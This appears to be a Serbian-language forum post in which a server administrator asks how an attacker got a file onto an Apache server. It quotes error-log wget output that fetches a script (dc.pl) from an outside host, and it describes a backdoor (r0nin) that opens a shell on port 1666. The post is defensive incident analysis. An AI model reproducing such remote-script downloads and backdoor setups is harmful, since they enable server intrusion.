--22:15:26-- http://sex.hotsteamyteens.com/dc.pl
=> `dc.pl.5'
Resolving sex.hotsteamyteens.com... 166.70.135.163
Connecting to sex.hotsteamyteens.com[166.70.135.163]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 759 [text/plain]
0K 100% 247K
22:15:29 (197.97 KB/s) - `dc.pl.5' saved [759/759]
to mi se nalazi na kraju error-log-a e sada sta mislite kako je ovo izvodljivo da mi radi takav upload na server??? Nasao sam taj fajl (dc.pl) u /var/tmp kao i fajl r0nin koji je verovatno backdoor koji otvara shell na 1666 portu. Tu je dc.pl klijent koji se kaci na njega! Backdoor su mogli da pokrenu pod permisiama www jer se pod tim userom vrti apache ali nisu backdoor-u moglu da pristupe jer je ispred servera firewall koji dozvoljava konekcije samo na portove 80 i 443 tako da :) E sada me interesuje u kojim slucajevima apache upisuje takav sadrzaj u error-log (mislim da obicno to ide u access_log)??? I kako je uopste moguce da su uradili takav upload??
CCIE #22192 )
https://pulsarpoint.rs
https://pulsarpoint.rs